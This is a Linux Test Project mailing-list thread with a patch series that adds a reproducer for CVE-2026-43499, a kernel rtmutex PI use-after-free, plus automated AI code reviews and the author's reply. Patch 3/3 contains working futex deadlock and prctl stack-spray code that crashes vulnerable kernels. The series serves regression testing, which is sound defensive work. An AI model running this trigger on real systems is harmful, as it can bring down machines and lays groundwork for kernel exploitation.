* [LTP] [PATCH v5 0/3] Reproducer for ghostlock
@ 2026-09-02 21:25 Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
` (2 more replies)
0 siblings, 3 replies; 7+ messages in thread
From: Andrea Cervesato @ 2026-09-02 21:25 UTC (permalink / raw)
To: Linux Test Project
Test for CVE-2026-43499 (GhostLock), a stack use-after-free in the
rtmutex PI code, fixed in kernel v7.1:
3bfdc63936dd ("rtmutex: Use waiter::task instead of current in remove_waiter()")
Reproducer based on the Nebula Security writeup and open-sourced PoC
(https://nebusec.ai/research/ionstack-part-2/, https://github.com/NebuSec/CyberMeowfia).
Beware, this test will crash the system on a vulnerable kernel.
Assisted by Kimi K3 for the analysis and written mostly with Gemini Pro
3.1 Max.
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v5:
- reduced synchronization checkpoints from 5 to 3
- introduced and used SAFE_SCHED_SETATTR() in lapi/sched.h
- dropped unused PR_SET_MM_MAP_SIZE probe in setup()
- fixed duplicated -pthread entry in Makefile
- fixed CVE numerical ordering in runtest/cve
- Link to v4: https://lore.kernel.org/20260826-cve-ghostlock-v4-0-52ec94d6635f@suse.com
Changes in v4:
- handle runtime inside the test
- increase futext wait so we don't TBROK before runtime
- comment prctl() syscall
- move static vars out of the run function
- Link to v3: https://lore.kernel.org/20260803-cve-ghostlock-v3-0-cde83fa429b7@suse.com
Changes in v3:
- improve sync mechanism
- fix lapi imports
- Link to v2: https://lore.kernel.org/20260803-cve-ghostlock-v2-0-b60588853140@suse.com
Changes in v2:
- fix build
- fix 32bit run
- Link to v1: https://lore.kernel.org/20260801-cve-ghostlock-v1-0-178f698f9702@suse.com
---
Andrea Cervesato (3):
lapi/sched: add SAFE_SCHED_SETATTR()
lapi/prctl: add more fallback definitions
cve: add CVE-2026-43499 reproducer
configure.ac | 2 +
include/lapi/prctl.h | 25 +++++
include/lapi/sched.h | 19 ++++
runtest/cve | 1 +
testcases/cve/.gitignore | 1 +
testcases/cve/Makefile | 2 +-
testcases/cve/ghostlock.c | 244 ++++++++++++++++++++++++++++++++++++++++++++++
7 files changed, 293 insertions(+), 1 deletion(-)
---
base-commit: 12724413534a6d4160ff9694ba6f09daa4ccb6bd
change-id: 20260801-cve-ghostlock-6ee4b2f69fd6
Best regards,
--
Andrea Cervesato <andrea.cervesato@suse.com>
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 7+ messages in thread
* [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR()
2026-09-02 21:25 [LTP] [PATCH v5 0/3] Reproducer for ghostlock Andrea Cervesato
@ 2026-09-02 21:25 ` Andrea Cervesato
2026-09-02 23:07 ` [LTP] " linuxtestproject.agent
2026-09-02 21:25 ` [LTP] [PATCH v5 2/3] lapi/prctl: add more fallback definitions Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 3/3] cve: add CVE-2026-43499 reproducer Andrea Cervesato
2 siblings, 1 reply; 7+ messages in thread
From: Andrea Cervesato @ 2026-09-02 21:25 UTC (permalink / raw)
To: Linux Test Project
From: Andrea Cervesato <andrea.cervesato@suse.com>
Add a safe variant of sched_setattr() that breaks the test with TBROK
on failure, so tests such as the CVE-2026-43499 reproducer do not have
to open-code the TEST() + tst_brk() error handling.
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
include/lapi/sched.h | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/include/lapi/sched.h b/include/lapi/sched.h
index 05b322c1c..6b49a1cda 100644
--- a/include/lapi/sched.h
+++ b/include/lapi/sched.h
@@ -169,4 +169,23 @@ static inline int getcpu(unsigned *cpu, unsigned *node)
# define CLONE_INTO_CGROUP 0x200000000ULL
#endif
+static inline int safe_sched_setattr(const char *file, const int lineno,
+ pid_t pid, const struct sched_attr *attr,
+ unsigned int flags)
+{
+ int ret;
+
+ ret = sched_setattr(pid, attr, flags);
+
+ if (ret == -1) {
+ tst_brk_(file, lineno, TBROK | TERRNO,
+ "sched_setattr(%i) failed", pid);
+ }
+
+ return ret;
+}
+
+#define SAFE_SCHED_SETATTR(pid, attr, flags)\
+ safe_sched_setattr(__FILE__, __LINE__, (pid), (attr), (flags))
+
#endif /* LAPI_SCHED_H__ */
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 7+ messages in thread
* [LTP] [PATCH v5 2/3] lapi/prctl: add more fallback definitions
2026-09-02 21:25 [LTP] [PATCH v5 0/3] Reproducer for ghostlock Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
@ 2026-09-02 21:25 ` Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 3/3] cve: add CVE-2026-43499 reproducer Andrea Cervesato
2 siblings, 0 replies; 7+ messages in thread
From: Andrea Cervesato @ 2026-09-02 21:25 UTC (permalink / raw)
To: Linux Test Project
From: Andrea Cervesato <andrea.cervesato@suse.com>
Add the following fallback definitions:
- PR_SET_MM
- PR_SET_MM_MAP
- PR_SET_MM_MAP_SIZE
- struct prctl_mm_map
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
configure.ac | 2 ++
include/lapi/prctl.h | 25 +++++++++++++++++++++++++
2 files changed, 27 insertions(+)
diff --git a/configure.ac b/configure.ac
index 19fc5e1b8..052b83e04 100644
--- a/configure.ac
+++ b/configure.ac
@@ -286,6 +286,8 @@ AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>])
AC_CHECK_TYPES([struct logical_block_metadata_cap],,,[#include <linux/fs.h>])
+AC_CHECK_TYPES([struct prctl_mm_map],,,[#include <sys/prctl.h>])
+
AC_CHECK_TYPES([struct sockaddr_vm],,,[
#include <sys/socket.h>
#include <linux/vm_sockets.h>
diff --git a/include/lapi/prctl.h b/include/lapi/prctl.h
index 8d3ef5c32..278401bb7 100644
--- a/include/lapi/prctl.h
+++ b/include/lapi/prctl.h
@@ -7,6 +7,7 @@
#ifndef LAPI_PRCTL_H__
#define LAPI_PRCTL_H__
+#include <stdint.h>
#include <sys/prctl.h>
#ifndef PR_SET_NAME
@@ -59,4 +60,28 @@
# define PR_SET_SPECULATION_CTRL 53
#endif
+#ifndef PR_SET_MM
+# define PR_SET_MM 35
+#endif
+#ifndef PR_SET_MM_MAP
+# define PR_SET_MM_MAP 14
+#endif
+#ifndef PR_SET_MM_MAP_SIZE
+# define PR_SET_MM_MAP_SIZE 15
+#endif
+
+#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP)
+struct prctl_mm_map {
+ uint64_t start_code, end_code;
+ uint64_t start_data, end_data;
+ uint64_t start_brk, brk;
+ uint64_t start_stack;
+ uint64_t arg_start, arg_end;
+ uint64_t env_start, env_end;
+ uint64_t *auxv;
+ uint32_t auxv_size;
+ uint32_t exe_fd;
+};
+#endif
+
#endif /* LAPI_PRCTL_H__ */
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 7+ messages in thread
* [LTP] [PATCH v5 3/3] cve: add CVE-2026-43499 reproducer
2026-09-02 21:25 [LTP] [PATCH v5 0/3] Reproducer for ghostlock Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 2/3] lapi/prctl: add more fallback definitions Andrea Cervesato
@ 2026-09-02 21:25 ` Andrea Cervesato
2 siblings, 0 replies; 7+ messages in thread
From: Andrea Cervesato @ 2026-09-02 21:25 UTC (permalink / raw)
To: Linux Test Project
From: Andrea Cervesato <andrea.cervesato@suse.com>
Add "Ghostlock" reproducer for CVE-2026-43499.
Reproducer based on the Nebula Security writeup and open-sourced PoC
(https://nebusec.ai/research/ionstack-part-2/,
https://github.com/NebuSec/CyberMeowfia).
Beware, this test will crash the system on a vulnerable kernel.
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
runtest/cve | 1 +
testcases/cve/.gitignore | 1 +
testcases/cve/Makefile | 2 +-
testcases/cve/ghostlock.c | 244 ++++++++++++++++++++++++++++++++++++++++++++++
4 files changed, 247 insertions(+), 1 deletion(-)
diff --git a/runtest/cve b/runtest/cve
index b096bacef..894863e33 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -88,6 +88,7 @@ cve-2023-1829 tcindex01
cve-2023-0461 setsockopt10
cve-2023-31248 nft02
cve-2023-52879 fanotify25
+cve-2026-43499 ghostlock
cve-2026-53362 setsockopt11
cve-2026-64600 refluxfs
# Tests below may cause kernel memory leak
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index a167a8743..f25aaf23a 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -18,3 +18,4 @@ cve-2025-21756
cve-2026-46331
refluxfs
sctphantom
+ghostlock
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
index 6be4999a3..b4e4178eb 100644
--- a/testcases/cve/Makefile
+++ b/testcases/cve/Makefile
@@ -11,7 +11,7 @@ stack_clash: CFLAGS += -fno-optimize-sibling-calls -Wno-infinite-recursion
cve-2016-7042: LDLIBS += $(KEYUTILS_LIBS)
-cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 refluxfs: CFLAGS += -pthread
+cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 ghostlock refluxfs: CFLAGS += -pthread
cve-2014-0196 cve-2016-7117 cve-2017-2671: LDLIBS += -lrt
ifneq ($(ANDROID),1)
diff --git a/testcases/cve/ghostlock.c b/testcases/cve/ghostlock.c
new file mode 100644
index 000000000..c53a18575
--- /dev/null
+++ b/testcases/cve/ghostlock.c
@@ -0,0 +1,244 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2026 Nebula Security <root@nebusec.ai>
+ * Copyright (c) 2026 Linux Test Project
+ */
+
+/*\
+ * Test for CVE-2026-43499 (GhostLock), a stack use-after-free in the
+ * rtmutex PI code, fixed in kernel v7.1:
+ * 3bfdc63936dd ("rtmutex: Use waiter::task instead of current in remove_waiter()")
+ *
+ * Reproducer based on the Nebula Security writeup and open-sourced PoC
+ * (https://nebusec.ai/research/ionstack-part-2/ and
+ * https://github.com/NebuSec/CyberMeowfia).
+ * Beware, this test will crash the system on a vulnerable kernel.
+ *
+ * [Algorithm]
+ *
+ * - Set up a three-futex PI deadlock topology.
+ * - Call :manpage:`futex(2)` with FUTEX_CMP_REQUEUE_PI on the waiter.
+ * - On a vulnerable kernel, the rollback from -EDEADLK leaves the waiter's
+ * pi_blocked_on pointer dangling on its own stack.
+ * - Waiter sprays its stack continuously via :manpage:`prctl(2)` (PR_SET_MM_MAP)
+ * with non-canonical addresses while main thread calls :manpage:`sched_setattr(2)`
+ * on the waiter to trigger a chain walk.
+ * - The chain walk dereferences the sprayed garbage, crashing a vulnerable
+ * kernel.
+ */
+
+#include "tst_test.h"
+#include "tst_timer.h"
+#include "tst_safe_clocks.h"
+#include "tst_safe_pthread.h"
+#include "lapi/syscalls.h"
+#include "lapi/sched.h"
+#include "lapi/prctl.h"
+#include "lapi/futex.h"
+
+#define ATTEMPTS 128
+#define POISON_PTR 0xdeadbee11c518f58ULL
+#define MAX_AUXV_WORDS 48
+
+#define CP_CHAIN_HELD 0
+#define CP_TARGET_HELD 1
+#define CP_SPRAYED 2
+
+static uint32_t f_wait;
+static uint32_t f_pi_target;
+static uint32_t f_pi_chain;
+
+static pid_t waiter_tid;
+static pid_t owner_tid;
+
+static unsigned long auxv[MAX_AUXV_WORDS];
+static uint32_t valid_auxv_size;
+static tst_atomic_t stop_spray;
+
+static const int try_sizes[] = {
+ MAX_AUXV_WORDS,
+ MAX_AUXV_WORDS - 4,
+ MAX_AUXV_WORDS - 8
+};
+
+static int futex_wait_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2,
+ struct timespec *ts)
+{
+ return tst_syscall(__NR_futex, uaddr, FUTEX_WAIT_REQUEUE_PI, 0, ts,
+ uaddr2, 0);
+}
+
+static int futex_cmp_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2)
+{
+ return tst_syscall(__NR_futex, uaddr, FUTEX_CMP_REQUEUE_PI, 1, 1,
+ uaddr2, 0);
+}
+
+static int futex_lock_pi(uint32_t *uaddr)
+{
+ return tst_syscall(__NR_futex, uaddr, FUTEX_LOCK_PI, 0, 0, 0, 0);
+}
+
+static int futex_unlock_pi(uint32_t *uaddr)
+{
+ return tst_syscall(__NR_futex, uaddr, FUTEX_UNLOCK_PI, 0, 0, 0, 0);
+}
+
+static void *waiter_fn(void *arg LTP_ATTRIBUTE_UNUSED)
+{
+ struct timespec ts;
+ struct prctl_mm_map mm_map = {
+ .start_code = (uint64_t)(uintptr_t)&waiter_fn,
+ .end_code = (uint64_t)(uintptr_t)&waiter_fn + 0x1000,
+ .start_data = (uint64_t)(uintptr_t)auxv & ~0xfffUL,
+ .end_data = ((uint64_t)(uintptr_t)auxv & ~0xfffUL) + 0x1000,
+ .start_brk = (uint64_t)(uintptr_t)sbrk(0),
+ .brk = (uint64_t)(uintptr_t)sbrk(0),
+ .start_stack = (uint64_t)(uintptr_t)&mm_map,
+ .arg_start = (uint64_t)(uintptr_t)&mm_map,
+ .arg_end = (uint64_t)(uintptr_t)&mm_map,
+ .env_start = (uint64_t)(uintptr_t)&mm_map,
+ .env_end = (uint64_t)(uintptr_t)&mm_map,
+ .auxv = (void *)auxv,
+ .auxv_size = valid_auxv_size,
+ .exe_fd = (uint32_t)-1,
+ };
+
+ waiter_tid = tst_syscall(__NR_gettid);
+
+ futex_lock_pi(&f_pi_chain);
+
+ TST_CHECKPOINT_WAKE(CP_CHAIN_HELD);
+
+ SAFE_CLOCK_GETTIME(CLOCK_MONOTONIC, &ts);
+ ts = tst_timespec_add(ts, (struct timespec){ .tv_sec = 10, .tv_nsec = 0 });
+ futex_wait_requeue_pi(&f_wait, &f_pi_target, &ts);
+
+ TST_CHECKPOINT_WAKE(CP_SPRAYED);
+
+ while (!tst_atomic_load(&stop_spray)) {
+ /* This is the syscall that poison the buffer and it might
+ * fail, so we don't use the SAFE_* variant.
+ */
+ prctl(PR_SET_MM, PR_SET_MM_MAP, (unsigned long)&mm_map,
+ sizeof(mm_map), 0);
+ }
+
+ futex_unlock_pi(&f_pi_chain);
+
+ return NULL;
+}
+
+static void *owner_fn(void *arg LTP_ATTRIBUTE_UNUSED)
+{
+ owner_tid = tst_syscall(__NR_gettid);
+
+ TST_CHECKPOINT_WAIT(CP_CHAIN_HELD);
+
+ futex_lock_pi(&f_pi_target);
+ TST_CHECKPOINT_WAKE(CP_TARGET_HELD);
+
+ futex_lock_pi(&f_pi_chain);
+
+ futex_unlock_pi(&f_pi_chain);
+ futex_unlock_pi(&f_pi_target);
+
+ return NULL;
+}
+
+static void setup(void)
+{
+ struct prctl_mm_map map = {
+ .exe_fd = (uint32_t)-1,
+ .auxv = (void *)auxv,
+ };
+ unsigned int i;
+
+ for (i = 0; i < MAX_AUXV_WORDS; i++)
+ auxv[i] = POISON_PTR + i * sizeof(unsigned long);
+
+ map.start_code = map.start_data = map.end_data =
+ map.start_brk = map.brk = map.start_stack = map.arg_start =
+ map.arg_end = map.env_start = map.env_end = (uint64_t)(uintptr_t)↦
+ map.end_code = map.start_code + 0x1000;
+
+ for (i = 0; i < ARRAY_SIZE(try_sizes); i++) {
+ valid_auxv_size = try_sizes[i] * sizeof(unsigned long);
+ map.auxv_size = valid_auxv_size;
+
+ if (prctl(PR_SET_MM, PR_SET_MM_MAP, &map, sizeof(map), 0) == 0)
+ break;
+ }
+
+ if (i == ARRAY_SIZE(try_sizes))
+ tst_brk(TBROK | TERRNO, "PR_SET_MM_MAP failed for all auxv sizes");
+
+ tst_res(TDEBUG, "Using auxv_size = %u", valid_auxv_size);
+}
+
+static void run(void)
+{
+ pthread_t waiter_th, owner_th;
+ struct sched_attr attr = {
+ .size = sizeof(attr),
+ .sched_policy = SCHED_BATCH,
+ .sched_nice = 19,
+ };
+ int i;
+
+ tst_res(TINFO, "Triggering PI deadlock and stack spray");
+
+ for (i = 0; i < ATTEMPTS; i++) {
+ if (!tst_remaining_runtime())
+ break;
+
+ f_wait = 0;
+ f_pi_target = 0;
+ f_pi_chain = 0;
+ tst_atomic_store(0, &stop_spray);
+
+ SAFE_PTHREAD_CREATE(&waiter_th, NULL, waiter_fn, NULL);
+ SAFE_PTHREAD_CREATE(&owner_th, NULL, owner_fn, NULL);
+
+ TST_CHECKPOINT_WAIT(CP_TARGET_HELD);
+
+ TST_THREAD_STATE_WAIT(owner_tid, 'S', 10000);
+ TST_THREAD_STATE_WAIT(waiter_tid, 'S', 10000);
+
+ TEST(futex_cmp_requeue_pi(&f_wait, &f_pi_target));
+ if (TST_RET != -1 || TST_ERR != EDEADLK)
+ tst_brk(TBROK | TTERRNO, "FUTEX_CMP_REQUEUE_PI did not return -EDEADLK");
+
+ TST_CHECKPOINT_WAIT2(CP_SPRAYED, 18000);
+
+ SAFE_SCHED_SETATTR(waiter_tid, &attr, 0);
+
+ tst_atomic_store(1, &stop_spray);
+
+ SAFE_PTHREAD_JOIN(waiter_th, NULL);
+ SAFE_PTHREAD_JOIN(owner_th, NULL);
+ }
+
+ if (i < ATTEMPTS)
+ tst_res(TINFO, "Runtime exhausted, executed %d/%d attempts", i, ATTEMPTS);
+
+ tst_res(TPASS, "Kernel survived %d GhostLock trigger attempts", i);
+}
+
+static struct tst_test test = {
+ .setup = setup,
+ .test_all = run,
+ .runtime = 180,
+ .needs_checkpoints = 1,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_CHECKPOINT_RESTORE=y",
+ "CONFIG_FUTEX_PI=y",
+ NULL
+ },
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "3bfdc63936dd"},
+ {"CVE", "2026-43499"},
+ {}
+ },
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 7+ messages in thread
* Re: [LTP] lapi/sched: add SAFE_SCHED_SETATTR()
2026-09-02 21:25 ` [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
@ 2026-09-02 23:07 ` linuxtestproject.agent
2026-09-03 7:14 ` Andrea Cervesato via ltp
0 siblings, 1 reply; 7+ messages in thread
From: linuxtestproject.agent @ 2026-09-02 23:07 UTC (permalink / raw)
To: Andrea Cervesato; +Cc: ltp
Hi Andrea,
On Sep 2, 2026, Andrea Cervesato wrote:
> lapi/sched: add SAFE_SCHED_SETATTR()
--- [PATCH 1/3] ---
> static inline int safe_sched_setattr(const char *file, const int lineno,
> pid_t pid, const struct sched_attr *attr,
> unsigned int flags)
> {
> int ret;
>
> ret = sched_setattr(pid, attr, flags);
glibc's sched_setattr() takes a non-const struct sched_attr pointer, so this
discards const and fails with -Werror=discarded-qualifiers on the new glibc
API. Match that prototype here and in the fallback declaration.
> #define SAFE_SCHED_SETATTR(pid, attr, flags)\
> safe_sched_setattr(__FILE__, __LINE__, (pid), (attr), (flags))
This new public macro needs a kernel-doc comment documenting its arguments
and failure behavior.
--- [PATCH 2/3] ---
> #ifndef PR_SET_MM_MAP
> # define PR_SET_MM_MAP 14
> #endif
> #ifndef PR_SET_MM_MAP_SIZE
> # define PR_SET_MM_MAP_SIZE 15
> #endif
>
> #if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP)
> struct prctl_mm_map {
The fallback struct is unreachable when needed because PR_SET_MM_MAP is
defined immediately before the condition. Gate it solely on
HAVE_STRUCT_PRCTL_MM_MAP, otherwise the new CVE test fails to compile on
systems lacking the struct.
--- [PATCH 3/3] ---
> static struct tst_test test = {
> .setup = setup,
> .test_all = run,
> .runtime = 180,
> .needs_checkpoints = 1,
PR_SET_MM_MAP was added in Linux 3.18. Add .min_kver = "3.18"; otherwise
3.3--3.17 kernels with both requested configs reach setup and report TBROK
for the unsupported operation.
> SAFE_CLOCK_GETTIME(CLOCK_MONOTONIC, &ts);
> ts = tst_timespec_add(ts, (struct timespec){ .tv_sec = 10, .tv_nsec = 0 });
> futex_wait_requeue_pi(&f_wait, &f_pi_target, &ts);
>
> TST_CHECKPOINT_WAKE(CP_SPRAYED);
The futex result is ignored, so expiry or another failure publishes
CP_SPRAYED without establishing the PI topology and causes a spurious TBROK.
Use an untimed blocking wait, or validate the result before the wake.
> refluxfs
> sctphantom
> ghostlock
Keep the new .gitignore entry sorted by placing ghostlock before refluxfs.
Verdict - Needs revision
---
Note:
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: [LTP] lapi/sched: add SAFE_SCHED_SETATTR()
2026-09-02 23:07 ` [LTP] " linuxtestproject.agent
@ 2026-09-03 7:14 ` Andrea Cervesato via ltp
0 siblings, 0 replies; 7+ messages in thread
From: Andrea Cervesato via ltp @ 2026-09-03 7:14 UTC (permalink / raw)
To: linuxtestproject.agent; +Cc: ltp
> PR_SET_MM_MAP was added in Linux 3.18. Add .min_kver = "3.18"; otherwise
> 3.3--3.17 kernels with both requested configs reach setup and report TBROK
> for the unsupported operation.
This can be ignored, the rest is valid. I will send a new version
--
Andrea Cervesato
SUSE QE Automation Engineer Linux
andrea.cervesato@suse.com
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: [LTP] lapi/sched: add SAFE_SCHED_SETATTR()
2026-09-03 7:26 [LTP] [PATCH v6 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
@ 2026-09-03 12:02 ` linuxtestproject.agent
0 siblings, 0 replies; 7+ messages in thread
From: linuxtestproject.agent @ 2026-09-03 12:02 UTC (permalink / raw)
To: Andrea Cervesato; +Cc: ltp
Hi Andrea,
On Sep 3, 2026, Andrea Cervesato wrote:
> lapi/sched: add SAFE_SCHED_SETATTR()
--- [PATCH 1/3] ---
> + * SAFE_SCHED_SETATTR() - Safe wrapper for sched_setattr().
linuxdoc requires macro names without the function suffix. Use
`SAFE_SCHED_SETATTR - Safe wrapper for sched_setattr().`
--- [PATCH 2/3] ---
> +struct prctl_mm_map {
This new public structure needs a kernel-doc comment with a
`struct prctl_mm_map` summary and entries for its members.
--- [PATCH 3/3] ---
> + futex_lock_pi(&f_pi_chain);
> +
> + TST_CHECKPOINT_WAKE(CP_CHAIN_HELD);
FUTEX_LOCK_PI can return ENOSYS at runtime, after which this checkpoint
incorrectly announces that the lock is held. Check all lock and unlock
calls, report ENOSYS as TCONF, and abort on other unexpected errors.
Verdict - Needs revision
---
Note:
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 7+ messages in thread
end of thread, other threads:[~2026-09-03 12:02 UTC | newest]
Thread overview: 7+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-02 21:25 [LTP] [PATCH v5 0/3] Reproducer for ghostlock Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
2026-09-02 23:07 ` [LTP] " linuxtestproject.agent
2026-09-03 7:14 ` Andrea Cervesato via ltp
2026-09-02 21:25 ` [LTP] [PATCH v5 2/3] lapi/prctl: add more fallback definitions Andrea Cervesato
2026-09-02 21:25 ` [LTP] [PATCH v5 3/3] cve: add CVE-2026-43499 reproducer Andrea Cervesato
-- strict thread matches above, loose matches on Subject: below --
2026-09-03 7:26 [LTP] [PATCH v6 1/3] lapi/sched: add SAFE_SCHED_SETATTR() Andrea Cervesato
2026-09-03 12:02 ` [LTP] " linuxtestproject.agent
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.